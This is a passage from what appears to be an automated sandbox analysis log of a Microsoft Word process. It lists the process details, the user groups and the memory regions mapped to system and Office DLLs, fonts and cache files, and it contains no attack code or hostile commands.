# Flog Txt Version 1 # Analyzer Version: 2.3.2 # Analyzer Build Date: Jan 8 2019 16:19:15 # Log Creation Date: 06.02.2019 16:40:33.224 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe" page_root = "0x37c7e000" os_pid = "0x948" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 134 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 135 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 136 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 137 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 138 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 139 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 140 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 141 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 142 start_va = 0xf0000 end_va = 0xf6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 143 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 144 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 145 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 146 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 147 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 148 start_va = 0x330000 end_va = 0x331fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 149 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 150 start_va = 0x350000 end_va = 0x351fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 151 start_va = 0x360000 end_va = 0x362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 152 start_va = 0x370000 end_va = 0x371fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 153 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 154 start_va = 0x390000 end_va = 0x392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 155 start_va = 0x3a0000 end_va = 0x3a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 156 start_va = 0x3b0000 end_va = 0x3b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 157 start_va = 0x3c0000 end_va = 0x3c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 158 start_va = 0x3d0000 end_va = 0x3d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 159 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 160 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 161 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 162 start_va = 0x820000 end_va = 0x1c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 163 start_va = 0x1c20000 end_va = 0x1eeefff entry_point = 0x1c20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 164 start_va = 0x1ef0000 end_va = 0x22e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Region: id = 165 start_va = 0x22f0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 166 start_va = 0x23f0000 end_va = 0x242ffff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 167 start_va = 0x2430000 end_va = 0x24affff entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 168 start_va = 0x24b0000 end_va = 0x258efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 169 start_va = 0x25c0000 end_va = 0x25c0fff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 170 start_va = 0x25d0000 end_va = 0x25dffff entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 171 start_va = 0x25e0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000025e0000" filename = "" Region: id = 172 start_va = 0x27e0000 end_va = 0x289ffff entry_point = 0x27e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 173 start_va = 0x28a0000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 174 start_va = 0x2a40000 end_va = 0x2a40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a40000" filename = "" Region: id = 175 start_va = 0x2a50000 end_va = 0x2a54fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 176 start_va = 0x2a60000 end_va = 0x2a60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a60000" filename = "" Region: id = 177 start_va = 0x2a70000 end_va = 0x2a71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a70000" filename = "" Region: id = 178 start_va = 0x2a80000 end_va = 0x2a8bfff entry_point = 0x2a80000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 179 start_va = 0x2a90000 end_va = 0x2a97fff entry_point = 0x2a90000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 180 start_va = 0x2aa0000 end_va = 0x2aaffff entry_point = 0x2aa0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 181 start_va = 0x2ab0000 end_va = 0x2ab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ab0000" filename = "" Region: id = 182 start_va = 0x2ac0000 end_va = 0x2ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ac0000" filename = "" Region: id = 183 start_va = 0x2ad0000 end_va = 0x2ad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ad0000" filename = "" Region: id = 184 start_va = 0x2ae0000 end_va = 0x2ae0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 185 start_va = 0x2af0000 end_va = 0x2af0fff entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 186 start_va = 0x2b00000 end_va = 0x2b01fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b00000" filename = "" Region: id = 187 start_va = 0x2b10000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 188 start_va = 0x2b20000 end_va = 0x2b20fff entry_point = 0x2b20000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 189 start_va = 0x2b30000 end_va = 0x2b30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b30000" filename = "" Region: id = 190 start_va = 0x2b40000 end_va = 0x2c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 191 start_va = 0x2c40000 end_va = 0x2c5ffff entry_point = 0x2c40000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 192 start_va = 0x2c60000 end_va = 0x2c61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c60000" filename = "" Region: id = 193 start_va = 0x2c70000 end_va = 0x2c70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002c70000" filename = "" Region: id = 194 start_va = 0x2c90000 end_va = 0x2c91fff entry_point = 0x0 region_type = private name = "private_0x0000000002c90000" filename = "" Region: id = 195 start_va = 0x2ca0000 end_va = 0x2ca0fff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 196 start_va = 0x2cc0000 end_va = 0x2ccffff entry_point = 0x0 region_type = private name = "private_0x0000000002cc0000" filename = "" Region: id = 197 start_va = 0x2cd0000 end_va = 0x2ce0fff entry_point = 0x2cd0000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 198 start_va = 0x2e10000 end_va = 0x2e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002e10000" filename = "" Region: id = 199 start_va = 0x2ea0000 end_va = 0x2f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 200 start_va = 0x2fa0000 end_va = 0x309ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 201 start_va = 0x30e0000 end_va = 0x315ffff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 202 start_va = 0x3180000 end_va = 0x327ffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 203 start_va = 0x3280000 end_va = 0x32fffff entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 204 start_va = 0x3350000 end_va = 0x33cffff entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 205 start_va = 0x33e0000 end_va = 0x33effff entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 206 start_va = 0x3400000 end_va = 0x34fffff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 207 start_va = 0x3500000 end_va = 0x38fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003500000" filename = "" Region: id = 208 start_va = 0x3970000 end_va = 0x3a6ffff entry_point = 0x0 region_type = private name = "private_0x0000000003970000" filename = "" Region: id = 209 start_va = 0x3a70000 end_va = 0x3aeefff entry_point = 0x3a70000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 210 start_va = 0x3b20000 end_va = 0x3c1ffff entry_point = 0x0 region_type = private name = "private_0x0000000003b20000" filename = "" Region: id = 211 start_va = 0x3c20000 end_va = 0x401ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c20000" filename = "" Region: id = 212 start_va = 0x4020000 end_va = 0x40cafff entry_point = 0x4020000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 213 start_va = 0x4100000 end_va = 0x41fffff entry_point = 0x0 region_type = private name = "private_0x0000000004100000" filename = "" Region: id = 214 start_va = 0x4260000 end_va = 0x435ffff entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 215 start_va = 0x4360000 end_va = 0x445ffff entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 216 start_va = 0x45a0000 end_va = 0x461ffff entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 217 start_va = 0x4620000 end_va = 0x471ffff entry_point = 0x0 region_type = private name = "private_0x0000000004620000" filename = "" Region: id = 218 start_va = 0x4720000 end_va = 0x4f1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004720000" filename = "" Region: id = 219 start_va = 0x4f20000 end_va = 0x5262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f20000" filename = "" Region: id = 220 start_va = 0x52f0000 end_va = 0x53effff entry_point = 0x0 region_type = private name = "private_0x00000000052f0000" filename = "" Region: id = 221 start_va = 0x53f0000 end_va = 0x54effff entry_point = 0x0 region_type = private name = "private_0x00000000053f0000" filename = "" Region: id = 222 start_va = 0x5540000 end_va = 0x554ffff entry_point = 0x0 region_type = private name = "private_0x0000000005540000" filename = "" Region: id = 223 start_va = 0x55d0000 end_va = 0x56cffff entry_point = 0x0 region_type = private name = "private_0x00000000055d0000" filename = "" Region: id = 224 start_va = 0x56d0000 end_va = 0x57cffff entry_point = 0x0 region_type = private name = "private_0x00000000056d0000" filename = "" Region: id = 225 start_va = 0x5870000 end_va = 0x587ffff entry_point = 0x0 region_type = private name = "private_0x0000000005870000" filename = "" Region: id = 226 start_va = 0x5890000 end_va = 0x598ffff entry_point = 0x0 region_type = private name = "private_0x0000000005890000" filename = "" Region: id = 227 start_va = 0x5a20000 end_va = 0x5b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a20000" filename = "" Region: id = 228 start_va = 0x5b20000 end_va = 0x644ffff entry_point = 0x5b20000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 229 start_va = 0x64c0000 end_va = 0x65bffff entry_point = 0x0 region_type = private name = "private_0x00000000064c0000" filename = "" Region: id = 230 start_va = 0x6630000 end_va = 0x672ffff entry_point = 0x0 region_type = private name = "private_0x0000000006630000" filename = "" Region: id = 231 start_va = 0x67a0000 end_va = 0x689ffff entry_point = 0x0 region_type = private name = "private_0x00000000067a0000" filename = "" Region: id = 232 start_va = 0x68b0000 end_va = 0x69affff entry_point = 0x0 region_type = private name = "private_0x00000000068b0000" filename = "" Region: id = 233 start_va = 0x6a60000 end_va = 0x6b5ffff entry_point = 0x0 region_type = private name = "private_0x0000000006a60000" filename = "" Region: id = 234 start_va = 0x6b60000 end_va = 0x7b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006b60000" filename = "" Region: id = 235 start_va = 0x7b60000 end_va = 0x835ffff entry_point = 0x0 region_type = private name = "private_0x0000000007b60000" filename = "" Region: id = 236 start_va = 0x8470000 end_va = 0x84effff entry_point = 0x0 region_type = private name = "private_0x0000000008470000" filename = "" Region: id = 237 start_va = 0x8680000 end_va = 0x86fffff entry_point = 0x0 region_type = private name = "private_0x0000000008680000" filename = "" Region: id = 238 start_va = 0x8700000 end_va = 0x8afffff entry_point = 0x0 region_type = private name = "private_0x0000000008700000" filename = "" Region: id = 239 start_va = 0x8b00000 end_va = 0x8f00fff entry_point = 0x0 region_type = private name = "private_0x0000000008b00000" filename = "" Region: id = 240 start_va = 0x8f10000 end_va = 0x9310fff entry_point = 0x0 region_type = private name = "private_0x0000000008f10000" filename = "" Region: id = 241 start_va = 0x9320000 end_va = 0x9720fff entry_point = 0x0 region_type = private name = "private_0x0000000009320000" filename = "" Region: id = 242 start_va = 0x9730000 end_va = 0x992ffff entry_point = 0x0 region_type = private name = "private_0x0000000009730000" filename = "" Region: id = 243 start_va = 0x9930000 end_va = 0xa930fff entry_point = 0x0 region_type = private name = "private_0x0000000009930000" filename = "" Region: id = 244 start_va = 0xa940000 end_va = 0xad3ffff entry_point = 0x0 region_type = private name = "private_0x000000000a940000" filename = "" Region: id = 245 start_va = 0x374f0000 end_va = 0x374fffff entry_point = 0x0 region_type = private name = "private_0x00000000374f0000" filename = "" Region: id = 246 start_va = 0x37620000 end_va = 0x3762ffff entry_point = 0x0 region_type = private name = "private_0x0000000037620000" filename = "" Region: id = 247 start_va = 0x75010000 end_va = 0x75042fff entry_point = 0x75010000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 248 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x773c0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 249 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x774e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 250 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 251 start_va = 0x777a0000 end_va = 0x777a6fff entry_point = 0x777a0000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 252 start_va = 0x777b0000 end_va = 0x777b2fff entry_point = 0x777b0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 253 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 254 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 255 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 256 start_va = 0x13ffb0000 end_va = 0x14018bfff entry_point = 0x13ffb0000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe") Region: id = 257 start_va = 0x7febd6d0000 end_va = 0x7febd6dffff entry_point = 0x0 region_type = private name = "private_0x000007febd6d0000" filename = "" Region: id = 258 start_va = 0x7febefc0000 end_va = 0x7febefcffff entry_point = 0x0 region_type = private name = "private_0x000007febefc0000" filename = "" Region: id = 259 start_va = 0x7fee4580000 end_va = 0x7fee47d4fff entry_point = 0x7fee4580000 region_type = mapped_file name = "ivy.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\IVY.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ivy.dll") Region: id = 260 start_va = 0x7fee47e0000 end_va = 0x7fee55b5fff entry_point = 0x7fee47e0000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll") Region: id = 261 start_va = 0x7fee55c0000 end_va = 0x7fee5733fff entry_point = 0x7fee55c0000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll") Region: id = 262 start_va = 0x7fee5740000 end_va = 0x7fee5859fff entry_point = 0x7fee5740000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ADAL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\adal.dll") Region: id = 263 start_va = 0x7fee5860000 end_va = 0x7fee5afafff entry_point = 0x7fee5860000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 264 start_va = 0x7fee5c30000 end_va = 0x7fee5cc8fff entry_point = 0x7fee5c30000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 265 start_va = 0x7fee5cd0000 end_va = 0x7fee5d3efff entry_point = 0x7fee5cd0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 266 start_va = 0x7fee5d40000 end_va = 0x7fee5ebdfff entry_point = 0x7fee5d40000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 267 start_va = 0x7fee5ec0000 end_va = 0x7fee608ffff entry_point = 0x7fee5ec0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 268 start_va = 0x7fee6090000 end_va = 0x7fee622cfff entry_point = 0x7fee6090000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 269 start_va = 0x7fee6230000 end_va = 0x7fee62effff entry_point = 0x7fee6230000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll") Region: id = 270 start_va = 0x7fee62f0000 end_va = 0x7feea6d6fff entry_point = 0x7fee62f0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll") Region: id = 271 start_va = 0x7feea6e0000 end_va = 0x7feeb3d4fff entry_point = 0x7feea6e0000 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll") Region: id = 272 start_va = 0x7feeb3e0000 end_va = 0x7feeb81cfff entry_point = 0x7feeb3e0000 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll") Region: id = 273 start_va = 0x7feeb820000 end_va = 0x7feeb901fff entry_point = 0x7feeb820000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 274 start_va = 0x7feeb910000 end_va = 0x7feed33bfff entry_point = 0x7feeb910000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll") Region: id = 275 start_va = 0x7feed340000 end_va = 0x7feedfe6fff entry_point = 0x7feed340000 region_type = mapped_file name = "mso98win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso98win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso98win32client.dll") Region: id = 276 start_va = 0x7feedff0000 end_va = 0x7feee07afff entry_point = 0x7feedff0000 region_type = mapped_file name = "mso50win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso50win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso50win32client.dll") Region: id = 277 start_va = 0x7feee080000 end_va = 0x7feeeb4efff entry_point = 0x7feee080000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 278 start_va = 0x7feeeb50000 end_va = 0x7feef233fff entry_point = 0x7feeeb50000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 279 start_va = 0x7feef240000 end_va = 0x7feef6e2fff entry_point = 0x7feef240000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 280 start_va = 0x7feef6f0000 end_va = 0x7feef78bfff entry_point = 0x7feef6f0000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcp140.dll") Region: id = 281 start_va = 0x7feef790000 end_va = 0x7fef0714fff entry_point = 0x7feef790000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll") Region: id = 282 start_va = 0x7fef0720000 end_va = 0x7fef07e5fff entry_point = 0x7fef0720000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 283 start_va = 0x7fef07f0000 end_va = 0x7fef2fc8fff entry_point = 0x7fef07f0000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll") Region: id = 284 start_va = 0x7fef3280000 end_va = 0x7fef3298fff entry_point = 0x7fef3280000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 285 start_va = 0x7fef46b0000 end_va = 0x7fef46cbfff entry_point = 0x7fef46b0000 region_type = mapped_file name = 